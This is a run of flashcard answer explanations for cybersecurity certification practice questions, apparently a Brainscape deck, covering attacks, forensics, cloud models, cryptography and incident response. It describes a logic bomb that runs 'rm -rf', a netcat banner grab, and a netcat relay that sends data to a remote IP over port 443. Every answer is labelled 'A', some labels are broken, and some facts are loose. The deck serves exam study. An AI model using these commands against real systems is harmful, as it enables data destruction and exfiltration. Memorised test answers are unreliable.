OBJ-1.5: The best option is to submit them to an open-source intelligence provider like VirusTotal. VirusTotal allows you to quickly analyze suspicious files and URLs to detect types of malware. It then automatically shares them with the security community, as well. Disassembly and static analysis would require a higher level of knowledge and more time to complete. Running the Strings tool can help identify text if the code is not encoded in a specific way within the malware, but you have to know what you are looking for, such as a malware signature. You should never scan the files using a local anti-virus or anti-malware engine if you suspect the workstation or server has already been compromised because the scanner may also be compromised.

Answer 459

A

Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the affected server, and maintain the chain of custody

OBJ-1.7: Since the database server is part of a critical production network, it is important to work with the business to time the remediation period to minimize productivity losses. You can immediately begin to capture network traffic since this won’t affect the database server or the network (least intrusive) while scheduling a period of downtime in which to take a forensic image of the database server’s hard drive. All network captures and the hard drive should be maintained under the chain of custody if needed for criminal prosecution or civil action after remediation. The server should be remediated and brought back online once the hard drive image has been created.

Answer 460

A

Smurf attack

OBJ-1.4: A smurf attack occurs when an attacker sends a ping to a subnet broadcast address and devices reply to spoofed IP (victim server), using up bandwidth and processing power. This image is a graphical depiction of this type of attack.

Answer 461

A

Agent-based scanning
OBJ-1.7: Using agent-based scanning, you typically get the most reliable results for systems that are not connected to the network, as well as the ones that are connected. This is ideal for traveling salespeople since their laptops are not constantly connected to the organization’s network. These agent-based scans can be conducted when the laptop is offline and then sent to a centralized server the next time it is connected to the network. Server-based scanning, non-credentialed scanning, and passive network monitoring all require a continuous network connection to collect the configurations of the devices accurately.

Answer 462

A

Logic bomb
OBJ-1.2: This short log shows a logic bomb on the Linux server. The first two lines show a crontab job is scheduled to run the backup script every 5 minutes. The cat command used in this example (line three) reads data from the file and displays it to the screen. In this case, we can see what actions the backupscript.sh files will take when it is run every five minutes as scheduled in the first two lines of this output. The script is shown as a bash shell script, and it will first determine if the string “jdion.usr” is found in the /etc/passwd file. Based on the context, you can assume jdion.usr is a possible user account on the system. If jdion.usr is NOT found in the passwd file, it will run the command “rm –rf” to recursively remove (rm) all the files and folders.

Answer 463

A

Blue team
OBJ-1.8: Penetration testing can form the basis of functional exercises. One of the best-established means of testing a security system for weaknesses is to play “war game” exercises in which the security personnel split into teams: red, blue, and white. The red team acts as the adversary. The blue team acts as the defenders. The white team acts as the referees and sets the parameters for the exercise. The yellow team is responsible for building tools and architectures in which the exercise will be performed.

Answer 464

A

Banner grabbing
OBJ-1.8: The analyst conducted banner grabbing. Banner grabbing is a technique used to learn information about a computer system on a network and the services running on its open ports. In the question, the command “nc test.diontraining.com 80” was used to establish a connection to a target web server using netcat, then send an HTTP request (HEAD / HTTP/1.1). The response contains information about the service running on the webserver. In this example, the server software version (Apache 2.0.46) and the operating system (Red Hat Linux). Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications where malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A query to the WHOIS database would return information on the website owner, not the server’s operating system.

Answer 465

A

Shoulder surfing
OBJ-1.1: While a malicious employee or insider could use all of the methods listed to obtain another user’s passwords, shoulder surfing is the MOST likely to be used. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder. Since a malicious employee or insider can work close to their victims (other users), they could easily use this technique to collect the victimized users’ passwords.

Answer 466

A

Privilege escalation
OBJ-1.3: The use of long query strings points to a buffer overflow attack, and the sudo command confirms the elevated privileges after the attack. This indicates a privilege escalation has occurred. While the other three options may have been used as an initial access vector, they cannot be confirmed based on the question’s details. Only a privilege escalation is currently verified within the scenario due to the use of sudo.

Answer 467

A

Missing patches
OBJ-1.6: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become victims of the exploit, and the server’s data can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements via web page input. SQL is commonly used against databases, but they are not useful when attacking file servers.

Answer 468

A

Directory traversal
OBJ-1.3: A directory traversal attack aims to access files and directories stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. The example output provided comes from a remote code execution vulnerability being exploited in which a directory traversal is used to access the files. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. SQL injection is the placement of malicious code in SQL statements via web page input. Password spraying attempts to crack various user’s passwords by attempting a compromised password against multiple user accounts.

Answer 469

A

Trojan
OBJ-1.2: A trojan is a type of malware that looks legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or in general, inflict some other harmful action on your data or network. The most common form of a trojan is a Remote Access Trojan (RAT), which allows an attacker to control a workstation or steal information remotely. To operate, a trojan will create numerous processes that run in the background of the system.

Answer 470

A

Cognitive password attack
OBJ-1.2: A cognitive password is a form of knowledge-based authentication that requires a user to answer a question, presumably something they intrinsically know, to verify their identity. If you post a lot of personal information about yourself online, this type of password can easily be bypassed. For example, during the 2008 , Vice Presidential candidate Sarah Palin’s email account was hacked because a high schooler used the “reset my password” feature on Yahoo’s email service to reset her password using the information that was publically available about Sarah Palin (like her birthday, high school, and other such information).

Answer 471

A

Race condition
OBJ-1.6: Race conditions occur when the outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer. In this scenario, the hacker’s exploit is racing to modify the configuration file before the application reads the number of lives from it. Sensitive data exposure is a fault that allows privileged information (such as a token, password, or PII) to be read without being subject to the proper access controls. Broken authentication refers to an app that fails to deny access to malicious actors. Dereferencing attempts to access a pointer that references an object at a particular memory location.

Answer 472

A

The full email header from one of the spam messages

OBJ-1.1: You should first request a copy of one of the spam messages, including the full email header. By reading through the full headers of one of the messages, you can determine where the email originated from, whether it was from your email system or external, and if it was a spoofed email or a legitimate email. Once this information has been analyzed, you can then continue your analysis based on those findings, whether that be analyzing your email server, the firewalls, or other areas of concern. If enough information cannot be found by analyzing the email headers, you will need to conduct more research to determine the best method to solve the underlying problem.

Answer 473

A

Buffer overflow
OBJ-1.2: The function DionCode may be subject to a buffer overflow as the user enters something over 20 characters as their input. In defining the char (character) type array, the programmer only allocated 20 characters worth of memory storage. To solve this problem, the programmer should create proper input validation to ensure that the input is less than 20 characters before passing the user_input variable to the strcpy (string copy) function.

Answer 474

A

Input validation
OBJ-1.3: Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks. A network layer firewall is a device that is designed to prevent unauthorized access, thereby protecting the computer network. It blocks unauthorized communications into the network and only permits authorized access based on the IP address, ports, and protocols in use. Cross-site request forgery (CSRF) is another attack type. A hypervisor controls access between virtual machines.

Answer 475

A

This approach only changes the location of the network and not the attack surface of it

OBJ-1.5: A poorly implemented security model at a physical location will still be a poorly implemented security model in a virtual location. Unless the fundamental causes of the security issues that caused the previous data breaches have been understood, mitigated, and remediated, then migrating the current images into the cloud will change where the processing occurs without improving the security of the network. While the statement concerning unrealized ROI may be accurate, it simply demonstrates the sunk cost argument’s fallacy. These servers were already purchased, and the money was spent. Regardless of whether we maintain the physical servers or migrate to the cloud, that money is gone. Those servers could also be repurposed, reused, or possibly resold to recoup some of the capital invested. While the company’s physical security will potentially improve in some regards, the physical security of the endpoints on-premises is still a concern that cannot be solved by this cloud migration. Additionally, the scenario never stated that physical security was an issue that required being addressed, so it is more likely that the data breach occurred due to a data exfiltration over the network. As a cybersecurity analyst, you must consider the business case and the technical accuracy of a proposed approach or plan to add the most value to your organization.

Answer 476

A

AES
OBJ-2.8: The Advanced Encryption Standard (AES) is a symmetric block cipher with a fixed block size of 128 bits. It can utilize a 128-bit, 192-bit, or 256-bit symmetric key. RSA, Diffie-Hellman, and ECC are all asymmetric algorithms.

Answer 477

A

Private
OBJ-2.2: Private cloud refers to a cloud computing model where IT services are provisioned over private IT infrastructure for the dedicated use of a single organization. A private cloud is usually managed via internal resources. The terms private cloud and virtual private cloud (VPC) are often used interchangeably.

Answer 478

A

Smartcard and PIN
OBJ-2.4: Multi-factor authentication (MFA) creates multiple security layers to help increase the confidence that the user requesting access is who they claim to be by requiring two distinct factors for authentication. These factors can be something you know (knowledge factor), something you have (possession factor), something you are (inheritance factor), something you do (action factor), or somewhere you are (location factor). By selecting a smartcard (something you have) and a PIN (something you know), you have implemented multi-factor authentication. Choosing a fingerprint and retinal scan would instead use only one factor (inheritance). Choosing a username, password, and security question would also be only using one factor (knowledge). For something to be considered multi-factor, you need items from at least two different authentication factor categories: knowledge, possession, inheritance, location, or action.

Answer 479

A

Hardware write blocker
OBJ-2.7: Both hardware and software write blockers are designed to ensure that forensic software and tools cannot change a drive inadvertently by accessing it. But, since the question indicates that you need to choose the BEST solution to protect the drive’s contents from being changed during analysis, you should pick the hardware write blocker. A hardware write blocker’s primary purpose is to intercept and prevent (or ‘block’) any modifying command operation from ever reaching the storage device. A forensic drive duplicator copies a drive and validates that it matches the original drive but cannot be used by itself during analysis. A degausser is used to wipe magnetic media. Therefore, it should not be used on the drive since it would erase the hard drive contents.

Answer 480

A

Hypervisor
OBJ-2.2: A hypervisor, also known as a virtual machine monitor, is a process that creates and runs virtual machines (VMs). A hypervisor allows one host computer to support multiple guest VMs by virtually sharing its resources, like memory and processing. To create and provision virtual machines within the Windows 2016 operating system, you can use a Type II hypervisor like VM Ware or VirtualBox.

Answer 481

A

You tell the developer to review their code and implement a bug/code fix

OBJ-2.3: Since your company owns the website, you can require the developer to implement a bug/code fix to prevent the form from allowing the AUTOCOMPLETE function to work on this website. The code change to perform is quite simple, simply adding “autocomplete=off” to the first line of the code. The resulting code would be .

Answer 482

A

SaaS
OBJ-2.2: Software as a Service (SaaS) is used to provide web applications to end-users. This can be a calendar, scheduling, invoicing, word processor, database, or other programs. For example, Google Docs and Officer 365 are both word processing SaaS solutions. QuickBooks Online is one example of a SaaS solution for accounting.

Answer 483

A

False acceptance rate
OBJ-2.4: False acceptance rate (FAR), or Type II, is the measure of the likelihood that the biometric security system will incorrectly accept an access attempt by an unauthorized user. The false rejection rate is calculated based upon the number of times an authorized user is denied access to the system.

Answer 484

A

The backup is a differential backup
OBJ-2.5: iPhone/iPad backups can be created as full or differential backups. In this scenario, the backup being analyzed is likely a differential backup containing the information that has changed since the last full backup. If the backup were encrypted, you would be unable to read any of the contents. If the backup were interrupted, the backup file would be in an unusable state. If the backup were stored in iCloud, you would need access to their iCloud account to retrieve and access the file. Normally, during an investigation, you will not have access to the user’s iCloud account.

Answer 485

A

MSSP
OBJ-2.2: A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. Security as a service or a managed service provider (MSP) would be better suited for this role.

Answer 486

A

Infrastructure as a Service
OBJ-2.2: Infrastructure as a Service (IaaS) is a computing method that uses the cloud to provide any or all infrastructure needs. In a VPC environment, an organization may provision virtual servers in a cloud-hosted network. The service consumer is still responsible for maintaining the IP address space and routing internally to the cloud. Platform as a Service (PaaS) is a computing method that uses the cloud to provide any platform-type services. Software as a Service (SaaS) is a computing method that uses the cloud to provide users with application services. Function as a Service (FaaS) is a cloud service model that supports serverless software architecture by provisioning runtime containers to execute code in a particular programming language.

Answer 487

A

RSA
OBJ-2.8: RSA (Rivest–Shamir–Adleman) was one of the first public-key cryptosystems and is widely used for secure data transmission. As a public-key cryptosystem, it relies on an asymmetric algorithm. AES, RC4, and DES are all symmetric algorithms.

Answer 488

A

Wiping
OBJ-2.7: Data wiping or clearing occurs by using a software tool to overwrite the data on a hard drive to destroy all electronic data on a hard disk or other media. Data wiping may be performed with a 1x, 7x, or 35x overwriting, with a higher number of times being more secure. This allows the hard drive to remain functional and allows for hardware reuse. Degaussing a hard drive involves demagnetizing a hard drive to erase its stored data. You cannot reuse a hard drive once it has been degaussed. Therefore, it is a bad solution for this scenario. Purging involves removing sensitive data from a hard drive using the device’s own electronics or an outside source (like a degausser). A purged device is generally not reusable. Shredding involves the physical destruction of the hard drive. This is a secure method of destruction but doesn’t allow for device reuse.

Answer 489

A

Infrastructure as Code (IaC)
OBJ-2.2: IaC is designed with the idea that a well-coded description of the server/network operating environment will produce consistent results across an enterprise and significantly reduce IT overhead costs through automation while precluding the existence of security vulnerabilities. SDN uses software to define networking boundaries but does not necessarily handle server architecture in the same way that IaC can. Infrastructure as a Service (IaaS) is a computing method that uses the cloud to provide any or all infrastructure needs. Software as a Service (SaaS) is a computing method that uses the cloud to provide users with application services.

Answer 490

A

SHA-2
OBJ-2.8: SHA-2 creates a 256-bit fixed output. SHA-1 creates a 160-bit fixed output. NTLM creates a 128-bit fixed output. MD-5 creates a 128-bit fixed output.

Answer 491

A

Install an anti-virus or anti-malware solution that uses heuristic analysis
OBJ-3.3: The only solution that could STOP this from reoccurring would be to use an anti-virus or anti-malware solution with heuristic analysis. The other options might be able to monitor and detect the issue but not stop it from spreading. Heuristic analysis is a method employed by many computer anti-virus programs designed to detect previously unknown computer viruses and new variants of viruses already in the wild. This is behavior-based detection and prevention, so it should detect the issue and stop it from spreading throughout the network.

Answer 492

A

MAC filtering
OBJ-3.4: Since the instructors need to keep the wireless network open, the BEST option is to implement MAC filtering to prevent the students from connecting to the network while still keeping the network open. Since the instructors would most likely use the same devices to connect to the network, it would be relatively easy to implement a MAC filtering based whitelist of devices that are allowed to use the open network and reject any other devices not listed by the instructors (like the student’s laptops or phones). Reducing the signal strength would not solve this issue since students and instructors are in the same classrooms. Using Network Address Translation and Quality of Service will not prevent the students from accessing or using the open network.

Answer 493

A

Fuzzing
OBJ-3.2: Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. User Acceptance Testing is the process of verifying that a created solution/software works for the user. Security regression testing ensures that changes made to a system do not harm its security, are therefore of high significance, and the interest in such approaches has steadily increased. Stress testing verifies the system’s stability and reliability by measuring its robustness and error handling capabilities under heavy load conditions.

Answer 494

A

Cryptographic erase
OBJ-3.2: In a cryptographic erase (CE), the storage media is encrypted by default. The encryption key itself is destroyed during the erasing operation. CE is a feature of self-encrypting drives (SED) and is often used with solid-state devices. Cryptographic erase can be used with hard drives, as well. Zero-fill is a process that fills the entire storage device with zeroes. For SSDs and hybrid drives, zero-fill-based methods might not be reliable because the device uses wear-leveling routines in the drive controller to communicate which locations are available for use to any software process accessing the device. A secure erase is a special utility provided with some solid-state drives that can perform the sanitization of flash-based devices. Overwrite is like zero-fill but can utilize a random pattern of ones and zeroes on the storage device. The most secure option would be a cryptographic erase (CE) for the question’s scenario.

Answer 495

A

VLAN
OBJ-3.3: A virtual local area network (VLAN) is a type of network segmentation configured in your network switches that prevent communications between different VLANs without using a router. This allows two virtually separated networks to exist on one physical network and separates the two virtual network’s data. A virtual private network (VPN) is a remote access capability to connect a trusted device over an untrusted network back to the corporate network. A VPN would not create the desired effect. WPA2 is a type of wireless encryption, but it will not create two different segmented networks on the same physical hardware. MAC filtering is used to allow or deny a device from connecting to a network, but it will not create two network segments, as desired.

Answer 496

A

RADIUS

OBJ-3.8: Captive portals usually rely on 802.1x, and 802.1x uses RADIUS for authentication.

Answer 497

A

Jumpbox
OBJ-3.3: Installing a jumpbox as a single point of entry for the administration of servers within the cloud is the best choice for this requirement. The jumpbox only runs the necessary administrative port and protocol (typically SSH). Administrators connect to the jumpbox then use the jumpbox to connect to the admin interface on the application server. The application server’s admin interface has a single entry in its ACL (the jumpbox) and denies any other hosts’ connection attempts. A bastion host is a special-purpose computer on a network specifically designed and configured to withstand attacks. The computer generally hosts a single application. For example, a proxy server and all other services are removed or limited to reduce the threat to the computer. An airgap system is a network or single host computer with unique security requirements that may physically be separated from any other network. Physical separation would prevent a system from accessing the remote administration interface directly and require an airgap system to reach the private cloud.

Answer 498

A

Input validation
OBJ-3.2: Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering a malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the user. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID. Output encoding involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the < string when writing to an HTML page.

Answer 499

A

Require authentication on wake-up
OBJ-3.8: To prevent the computer from being used inadvertently to access the network, the system should be configured to require authentication whenever the computer is woken up. Therefore, if an authorized user walks away from the computer and goes to sleep when another person tries to use the computer, it will ask for a username and password before granting them access to the network.

Answer 500

A

RDP
OBJ-3.1: Port 3389 is an RDP port used for the Remote Desktop Protocol. If this port isn’t supposed to be opened, then an incident response plan should be the next step since this can be used for remote access by an attacker. MySQL runs on port 3306. LDAP runs on port 389. IMAP over SSL runs on port 993.

Answer 501

A

Incorrect security settings in the email client

OBJ-3.1: This is a security setting in the mail client to prevent malicious malware and viruses from entering your environment. If the images are not downloaded on a received email, they will display as a red X within the reply email. If the email was forwarded, then the images will be displayed as a white box with a black border. This can be seen in the source code as ‘Image Removed by Sender’ next to where the Images should be. For example, in the Microsoft Outlook email client, the security settings for hosted images can be changed within the mail client’s Trust Center (Outlook Options -> Trust Center -> Trust Center Settings).

Answer 502

A

ABAC
OBJ-3.8: Attribute-based access control (ABAC) provides the most detailed and explicit type of access control over a resource because it is capable of making access decisions based on a combination of subject and object attributes, as well as context-sensitive or system-wide attributes. Information such as the group membership, the OS being used by the user, and even the machine’s IP address could be considered when granting or denying access.

Answer 503

A

Cloud services
OBJ-3.6: The on-demand nature of cloud services means that instances are often created and destroyed again, with no real opportunity for forensic recovery of any data. Cloud providers can mitigate this to some extent by using extensive logging and monitoring options. A CSP might also provide an option to generate a file system and memory snapshots from containers and VMs in response to an alert condition generated by a SIEM. Employee workstations are often the easiest to conduct forensics on since they are a single-user environment for the most part. Mobile devices have some unique challenges due to their operating systems, but good forensic tool suites are available to ease the forensic acquisition and analysis of mobile devices. On-premise servers are more challenging than a workstation to analyze, but they do not suffer from the same issues as cloud-based services and servers.

Answer 504

A

NAC
OBJ-3.3: Network Access Control (NAC) is an approach to computer security that attempts to unify endpoint security technology (such as anti-virus, host intrusion prevention, and vulnerability assessment), user or system authentication, and network security enforcement. When a remote workstation connects to the network, NAC will place it into a segmented portion of the network (sandbox), scan it for malware and validate its security controls, and then based on the results of those scans, either connect it to the company’s networks or place the workstation into a separate quarantined portion of the network for further remediation. An access control list (ACL) is a network traffic filter that can control incoming or outgoing traffic. An ACL alone would not have prevented this issue. MAC Filtering refers to a security access control method whereby the MAC address assigned to each network card is used to determine access to the network. MAC filtering operates at layer 2 and is easy to bypass. Sender Policy Framework (SPF) is an email authentication method designed to detect forging sender addresses during the email delivery.

Answer 505

A

L3 cache
OBJ-4.5: When collecting evidence, you should always follow the order of volatility. This will allow you to collect the most volatile evidence (most likely to change) first and the least volatile (least likely to change) last. You should always begin collecting the CPU registers and cache memory (L1/L2/L3/GPU). The contents of system memory (RAM), including a routing table, ARP cache, process tables, kernel statistics, and temporary file systems/swap space/virtual memory. Next, you would move onto the collection of data storage devices like hard drives, SSDs, and flash memory devices. After that, you would move onto less volatile data such as backup tapes, external media devices (hard drives, DVDs, etc.), and even configuration data or network diagrams.

Answer 506

A

Scan the network for additional instances of this vulnerability and patch the affected assets

OBJ-4.2: All of the options listed are the best security practices to implement before and after a detected intrusion, but scanning for additional instances of this vulnerability should be performed first. Often, an enterprise network uses the same baseline configuration for all servers and workstations. Therefore, if a vulnerability is exploited on one device (such as an insecure configuration), that same vulnerability could exist on many other assets across the network. During your recovery, you must identify if any other network systems share the same vulnerability and mitigate them. If you don’t, the attacker could quickly reinfect your network by simply attacking another machine using the same techniques used during this intrusion. The other options listed are all examples of additional device hardening that should be conducted during recovery after you have identified the exploited vulnerability across the rest of the network.

Answer 507

A

Permit 143.27.43.32 161.212.71.14 RDP 3389
OBJ-4.4: Due to the requirement to allow a single remote IP to enter the firewall, the permit statement must start with a single IP in the Untrusted (Internet) zone. Based on the options provided, only 143.27.43.32 could be correct. Next, the destination is a single server in the DMZ, so only 161.212.71.14 could be correct. The destination port should be 3389, which is the port for the Remote Desktop Protocol. Combining these three facts, only “permit 143.27.43.32 161.212.71.14 RDP 3389” could be correct.

Answer 508

A

Syslog
OBJ-4.3: The Syslog server is a centralized log management solution. By looking through the logs on the Syslog server, the technician could determine which service failed on which server since all the logs are retained on the Syslog server from all of the network devices and servers. Network mapping is conducted using active and passive scanning techniques and could help determine which server was offline, but not what caused the interruption. Firewall logs would only help determine why the network connectivity between a host and destination may have been disrupted. A network intrusion detection system (NIDS) is used to detect hacking activities, denial of service attacks, and port scans on a computer network. It is unlikely to provide the details needed to identify why the network service was interrupted.

Answer 509

A

nmap
OBJ-4.1: Nmap sends specially crafted packets to the target host(s) and then analyzes the responses to determine the open ports and services running on those hosts. Also, nmap can determine the versions of the applications being used on those ports and services. Nmap is a command-line tool for use on Linux, Windows, and macOS systems. The netstat (network statistics) tool is a command-line utility that displays network connections for incoming and outgoing TCP packets, routing tables, and some network interface and network protocol statistics. Still, it cannot identify open ports and services on a host with their version numbers. The ping tool is used to query another computer on a network to determine whether there is a valid connection. Wireshark is an open-source packet analyzer used for network troubleshooting, analysis, software and communications protocol development, and education.

Answer 510

A

Processor Cache, Random Access Memory, Swap File, Hard Drive or USB Drive

OBJ-4.5: The correct order for evidence collection based on the order of volatility is the Processor Cache, Random Access Memory, Swap File, and then the Hard Drive or USB Drive. Since the Processor Cache is the most volatile and changes the most frequently, it should be captured first. Random Access Memory (RAM) is temporary storage on a computer. It can quickly change or be overwritten, and the information stored in RAM is lost when power is removed from the computer, so it should be collected second. Swap files are temporary files on a hard disk used as virtual memory, and therefore, they should be collected third. The files on a hard disk or USB drive are the least volatile of the four options presented since they are used for long-term storage of data and are not lost when the computer loses power.

Answer 511

A

.ps1
OBJ-4.1: If you want to save a series of PowerShell commands in a file to rerun them later, you effectively create a PowerShell script. This is simply a text file with a .ps1 extension. The file contains a series of PowerShell commands, with each command appearing on a separate line.

Answer 512

A

Port scan targeting 10.10.3.6
OBJ-4.1: Port Scanning is the name for the technique used to identify open ports and services available on a network host. Based on the logs, you can see a sequential scan of some commonly used ports (20, 21, 22, 23, 25, 80, 135, 443, 445) with a two-second pause between each attempt. The scan source is 10.10.3.2, and the destination of the scan is 10.10.3.6, making “Port scan targeting 10.10.3.6” the correct choice. IP fragmentation attacks are a common form of denial of service attack, in which the perpetrator overbears a network by exploiting datagram fragmentation mechanisms. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions.

Answer 513

A

Isolating affected systems
OBJ-4.4: Isolation involves removing an affected component from whatever larger environment it is a part of. This can be everything from removing a server from the network after it has been the target of a DoS attack, placing an application in a sandbox virtual machine (VM) outside of the host environments it usually runs on. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture. Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from communicating outside the protected segment. Removal is not an industry term used but would be a synonym for isolation. Enumeration is defined as the process of extracting user names, machine names, network resources, shares, and services from a system. Isolating the attacker would only stop their direct two-way communication and control of the affected system. However, it would not be the strongest possible response since there could be malicious code still running on your victimized machine.

Answer 514

A

Cain and Abel
OBJ-4.1: Cain and Abel is a popular password cracking tool. It can recover many password types using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force, and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client Password Decoding too. CUPP is used to create password lists. Nessus is a vulnerability scanner. The netcat tool is used to create reverse shells for remote access.

Answer 515

A

Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

OBJ-4.1: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character allows multiple commands to execute during a single command execution. Next, netcat sends the data to the given IP (192.168.1.76) over port 443. This is a common technique o bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).

Answer 516

A

192.186.1.100
OBJ-4.3: This question tests your ability to determine if an IP address is a publicly routable IP (external connection) or private IP (internal connection). Private IP addresses are either 10.x.x.x, 172.16-31.x.x, or 192.168.x.x. All other IP addresses are considered publicly routable over the internet (except localhost and APIPA addresses). Therefore, the answer must be 192.186.1.100 since it is not a private IP address.

Answer 517

A

Identify, implement, and document compensating controls
OBJ-5.1: Since the analyst cannot remediate the vulnerabilities by installing a patch, the next best action would be to implement some compensating controls. If a vulnerability exists that cannot be patched, compensating controls can mitigate the risk. Additionally, the analyst should document the current situation to achieve compliance with PCI DSS. The analyst will likely not remove the terminals from the network without affecting business operations, so this is a bad option. The analyst should not build a custom OS image with the patch since this could void the support agreement with the manufacturer and introduce additional vulnerabilities. Also, it would be difficult (or impossible) to replace the POS terminals with standard Windows systems due to the custom firmware and software utilized on these systems.

Answer 518

A

Conduct a data criticality and prioritization analysis

OBJ-5.4: While the payroll server could be assumed to holds PII, financial information, and corporate information, the analyst would only be making that assumption based on its name. Even before an incident response occurs, it would be a good idea to conduct a data criticality and prioritization analysis to determine what assets are critical to your business operations and need to be prioritized for protection. After an intrusion occurs, this information could be used to better protect and defend those assets against an attacker. Since the question states the analyst is trying to determine which server to look at based on their names, it is clear this organization never performed a data criticality and prioritization analysis and should do that first. After all, with names like FIREFLY, DEATHSTAR, THOR, and Dion, the analyst has no idea what is stored on those systems. For example, how do we know that DEATHSTAR doesn’t contain their credit card processing systems that would be a more lucrative target for APT 38 than the PAYROLL_DB. The suggestions of hardening, logically isolating, or conducting a vulnerability scan of a particular server are random guesses by the analyst since they don’t know which data they should focus on protecting or where the attacker is currently.

Answer 519

A

NDA
OBJ-5.3: This is the definition of a non-disclosure agreement (NDA). There may be two NDAs in use: One from the organization to the pentester and another from the pentester to the organization. The Scope of Work is a formal document stating what will and will not be performed during a penetration test. It should also contain the assessment’s size and scope and a list of the assessment’s objectives. A master service agreement, or MSA, is a contract reached between parties, in which the parties agree to most of the terms that will govern future transactions or future agreements. The MSA is used when a pentester will be on retainer for a multi-year contract, and an individual SOW will be issued for each assessment to define the individual scopes for each one. Corporate policy is a documented set of broad guidelines, formulated after analyzing all internal and external factors that can affect an organization’s objectives, operations, and plans.

Answer 520

A

Conducting a brute force login attempt of a remote service on 192.168.1.142
OBJ-1.2: The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username or find a hidden web page, or find the key used to encrypt a message, using a trial and error approach and hoping, eventually, to guess correctly. Port Scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions. A ping sweep is a basic network scanning technique used to determine which range of IP addresses map to live hosts.

Answer 521

A

Explanation
OBJ-2.8: The Data Encryption Standard (DES) is a symmetric-key algorithm for encrypting digital data. Although its short key length of 56 bits makes it too insecure for applications, it was the standard used from 1977 until the early 2000s. GPG, ECC, and DSA are all asymmetric algorithms.

Brainscape's Knowledge GenomeTM

Dion practice tests Flashcards

Brainscape's Knowledge Genome^TM